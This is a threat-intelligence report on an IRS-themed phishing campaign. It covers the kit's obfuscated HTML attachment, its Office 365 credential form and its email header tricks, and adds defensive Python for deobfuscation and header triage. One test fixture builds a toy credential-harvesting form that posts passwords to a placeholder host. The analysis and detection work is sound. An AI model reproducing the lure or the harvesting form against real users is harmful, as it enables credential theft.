Cybercriminals leverage advanced tactics in their phishing kits, giving them a high success rate in delivering spoofed emails with malicious attachments just before a tax filing deadline. Shortly before the IRS filing deadline for tax year 2021 in the United States (April 18, 2022), a notable campaign was detected that used phishing emails impersonating the IRS and, in particular, one of the industry vendors that provides solutions to government agencies, including e-mail, digital communications management and a content delivery system that notifies citizens of various updates.
Cybercriminals deliberately choose times when everyone is busy with taxes or preparing for holidays (e.g. Easter), so you should be especially careful during these periods.
The spoofed IT service provider is widely used by major federal agencies, including DHS, and by similar state and city websites in the United States. The identified phishing email warned victims of a late payment owed to the IRS, which they would then have to settle via PayPal; the email contained an HTML attachment mimicking an electronic invoice.
Notably, the email does not contain any URLs and was delivered to the victim’s inbox without being flagged as potential spam. Based on the inspected headers, the email was relayed through multiple “hops”, primarily using US-registered network hosts and domains:
It should be noted that, as of the date of detection, none of the hosts involved had previously been “blacklisted”, and none showed signs of a negative IP address reputation or an anomalous domain reputation:
The HTML attachment with the fake IRS invoice contains obfuscated JS-based code.
Further analysis revealed embedded scripts that detect the victim’s IP address (using the GEO2IP module deployed on a third-party website), most likely to select targets or filter them by region.
Once the user opens the HTML attachment, the phishing script encourages them to enter their credentials via an interactive form that impersonates the Office 365 sign-in mechanism.
After the user enters their credentials, the phishing kit automatically attempts to verify access to the victim’s email account via IMAP:
Based on the deobfuscated JS content, the actors used the domain “supportmicrohere[.]com”. They probably tried to impersonate Microsoft technical support and trick the user with a domain whose spelling resembles the legitimate one.
The script intercepts the entered credentials and passes them on in a POST request:
The HTTP POST transmits the login and password to a script deployed on jbdelmarket[.]com:
The jbdelmarket[.]com domain hosts a set of scripts that analyze the victim’s IP address:
The actors record all hosts accessing the phishing page:
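The attachment analysis above (obfuscated JS, a third-party IP lookup, an Office 365 lookalike form and a POST of the credentials to a kit host) can be reproduced as a static triage step. The following is an added example, not code from the original report or from the phishing kit: it peels `unescape('%..')` and `atob('..')` layers from an HTML attachment without executing any JavaScript, then extracts contacted domains, form targets and input names as candidate indicators. The sample attachment is constructed inline from placeholder `.invalid` domains; nothing in it is a real indicator from the campaign.

```python
"""Static triage of an HTML phishing attachment (added example, constructed sample)."""
import base64
import re
import urllib.parse

# --- Constructed sample: a toy page using the same obfuscation style as the kit ---
# Inner form is percent-encoded and written via unescape(); the IP lookup is base64 via atob().
# All domains are reserved .invalid placeholders, not indicators from the report.
INNER_FORM = (
    '<form action="https://kit-host.invalid/post.php" method="post">'
    '<h2>Sign in to your Office 365 account</h2>'
    '<input name="email"><input type="password" name="password">'
    '<button>Next</button></form>'
)
INNER_JS = 'fetch("https://geo-lookup.invalid/json/").then(r=>r.json()).then(d=>{window.ip=d.ip});'


def _percent_encode(s: str) -> str:
    """Encode every character as %XX, the way a kit feeds unescape()."""
    return "".join(f"%{ord(c):02X}" for c in s)


SAMPLE_HTML = f"""<html><body>
<script>document.write(unescape('{_percent_encode(INNER_FORM)}'))</script>
<script>eval(atob('{base64.b64encode(INNER_JS.encode()).decode()}'))</script>
</body></html>"""

# --- Analyzer ---
UNESCAPE_RE = re.compile(r"unescape\(\s*'([^']*)'\s*\)")
ATOB_RE = re.compile(r"atob\(\s*'([^']*)'\s*\)")
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)[^\s'\"<>]*")
LURE_MARKERS = ("office 365", "office365", "microsoft", "outlook")


def decode_layers(html: str, max_rounds: int = 5) -> str:
    """Replace unescape()/atob() string literals with their decoded text, repeatedly.

    Nothing is executed; decoded text is only substituted so later scans can see it.
    """
    text = html
    for _ in range(max_rounds):
        new = UNESCAPE_RE.sub(lambda m: urllib.parse.unquote(m.group(1)), text)
        new = ATOB_RE.sub(
            lambda m: base64.b64decode(m.group(1)).decode("utf-8", "replace"), new
        )
        if new == text:
            break
        text = new
    return text


def extract_domains(text: str) -> list:
    """Unique, sorted domains from every http(s) URL in the decoded text."""
    return sorted({m.group(1).lower() for m in URL_RE.finditer(text)})


def form_actions(text: str) -> list:
    return re.findall(r"<form[^>]*\baction=[\"']([^\"']+)", text, flags=re.I)


def input_names(text: str) -> list:
    return re.findall(r"<input[^>]*\bname=[\"']([^\"']+)", text, flags=re.I)


def analyze(html: str) -> dict:
    """Decode obfuscation layers and summarize what the page would contact and collect."""
    decoded = decode_layers(html)
    lower = decoded.lower()
    actions = form_actions(decoded)
    fields = input_names(decoded)
    return {
        "layers_decoded": decoded != html,
        "domains": extract_domains(decoded),
        "form_actions": actions,
        "input_names": fields,
        "o365_lure": any(marker in lower for marker in LURE_MARKERS),
        # A password field posting to some action is the credential-harvest signature.
        "harvests_credentials": bool(actions)
        and any(n.lower() in ("password", "passwd", "pass") for n in fields),
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_HTML).items():
        print(f"{key}: {value}")
```

The decoder only rewrites string literals, so a kit that builds strings piecewise or uses `%uXXXX` escapes would need an extra pass; the point is that the exfiltration host and the lookup service usually surface after one or two layers, without running the attachment in a browser.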
Notably, the header of the phishing email contains several domain names with SPF and DKIM records:
Additionally, the attackers made use of email header fields, including X-Account-Code (“USIRS”), X-Destination-ID and X-ReportingKey ([email protected][.]com).
The phishing email also had a Return-Path field set to another attacker-controlled email address, which collects information about emails that could not be delivered. The Return-Path is used to handle bounced emails and defines how and where bounces are processed:
- crownedbydivinity[.]com
- [email protected][.]com
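The header observations above (multiple relay hops, SPF and DKIM records that pass for the attacker’s own domains, vendor-style X-headers, a Return-Path pointing elsewhere than the From address, and an HTML attachment with no URLs) translate directly into a mail-gateway triage rule. The following is an added example, not the report’s own tooling: it parses a constructed message with Python’s standard `email` library and reports those signals. The sample message, its hosts and addresses are placeholders on `.invalid` domains and are not indicators from the campaign.

```python
"""Header and attachment triage for an IRS-themed lure (added example, constructed sample)."""
import email
import re
from email import policy
from email.message import EmailMessage

# Constructed sample message; every host/address is a .invalid placeholder.
SAMPLE_RAW = b"""\
Return-Path: <bounce@attacker-bounce.invalid>
Received: from relay2.hosting.invalid (relay2.hosting.invalid [203.0.113.20])
\tby mx.victim.invalid with ESMTP id abc123; Mon, 18 Apr 2022 09:12:01 +0000
Received: from relay1.hosting.invalid (relay1.hosting.invalid [198.51.100.7])
\tby relay2.hosting.invalid with ESMTP id def456; Mon, 18 Apr 2022 09:11:58 +0000
Authentication-Results: mx.victim.invalid; spf=pass smtp.mailfrom=attacker-bounce.invalid; dkim=pass header.d=attacker-bounce.invalid
From: "Internal Revenue Service" <noreply@irs-notices.invalid>
To: taxpayer@victim.invalid
Subject: Late payment notice - invoice attached
X-Account-Code: USIRS
X-Destination-ID: 12345
X-ReportingKey: report@attacker-reporting.invalid
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="BOUNDARY"

--BOUNDARY
Content-Type: text/plain; charset="utf-8"

Your IRS payment is overdue. Open the attached invoice to pay.
--BOUNDARY
Content-Type: text/html; name="invoice.html"
Content-Disposition: attachment; filename="invoice.html"

<html><body><script>eval(unescape('%61%6c%65%72%74'))</script></body></html>
--BOUNDARY--
"""

# Header names seen in the campaign (from the report); values here are placeholders.
PROVIDER_HEADERS = ("X-Account-Code", "X-Destination-ID", "X-ReportingKey")
OBFUSCATION_MARKERS = ("eval(", "unescape(", "atob(", "fromCharCode", "document.write(")


def parse_message(raw: bytes) -> EmailMessage:
    return email.message_from_bytes(raw, policy=policy.default)


def received_hops(msg: EmailMessage) -> list:
    """Relay hostnames from each Received header, most recent first."""
    hops = []
    for value in msg.get_all("Received", []):
        m = re.search(r"from\s+(\S+)\s+\(([^)]*)\)", str(value))
        if m:
            hops.append(m.group(1))
    return hops


def _domain(header_value) -> str:
    m = re.search(r"@([\w.-]+)", str(header_value or ""))
    return m.group(1).lower() if m else None


def auth_results(msg: EmailMessage) -> dict:
    """SPF/DKIM outcomes as recorded by the receiving MX (pass means little on its own)."""
    ar = str(msg.get("Authentication-Results", ""))
    results = {}
    for mech in ("spf", "dkim"):
        m = re.search(rf"\b{mech}=(\w+)", ar)
        results[mech] = m.group(1) if m else None
    return results


def suspicious_html_attachments(msg: EmailMessage) -> list:
    """(filename, obfuscation markers found) for each HTML attachment."""
    found = []
    for part in msg.iter_attachments():
        fname = part.get_filename() or ""
        if part.get_content_type() != "text/html" and not fname.lower().endswith((".html", ".htm")):
            continue
        body = part.get_content()
        markers = [m for m in OBFUSCATION_MARKERS if m in body]
        found.append((fname, markers))
    return found


def triage(raw: bytes) -> dict:
    msg = parse_message(raw)
    from_dom, rp_dom = _domain(msg["From"]), _domain(msg["Return-Path"])
    body_part = msg.get_body(preferencelist=("plain",))
    body_text = body_part.get_content() if body_part else ""
    attachments = suspicious_html_attachments(msg)
    provider = {h: str(msg[h]) for h in PROVIDER_HEADERS if msg[h] is not None}
    report = {
        "hops": received_hops(msg),
        "from_domain": from_dom,
        "return_path_domain": rp_dom,
        "return_path_mismatch": from_dom != rp_dom,
        "auth": auth_results(msg),
        "provider_headers": provider,
        "html_attachments": attachments,
        "has_urls": bool(re.search(r"https?://", body_text)),
    }
    # Authentication passing for the attacker's own domain is not a clean signal; the
    # obfuscated HTML attachment, or bounce handling routed away from the From domain
    # combined with vendor-style headers, is what should raise the verdict.
    report["suspicious"] = bool(attachments) or (report["return_path_mismatch"] and bool(provider))
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE_RAW).items():
        print(f"{key}: {value}")
```

Because the campaign’s messages carried no URLs, a URL-reputation filter has nothing to score; the rule therefore leans on the attachment and on the mismatch between the visible sender domain and the Return-Path domain, which are exactly the two things a legitimate government notification from this vendor would not exhibit.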
The Resecurity HUNTER team has shared information about the identified phishing campaign with the Internal Revenue Service (IRS), Online Fraud Detection and Prevention (OFDP), and the Treasury Inspector General for Tax Administration (TIGTA) hotline. We encourage Internet users to be particularly careful when receiving such e-mails and to validate them before opening any attachments, as doing so could compromise your digital identity and/or your e-mail account and lead to the theft of data.
For independent security researchers and the cybersecurity community, we are sharing a sample of the phishing emails captured by our Cyber Threat Intelligence system for further review, to increase detection of similar campaigns in the future.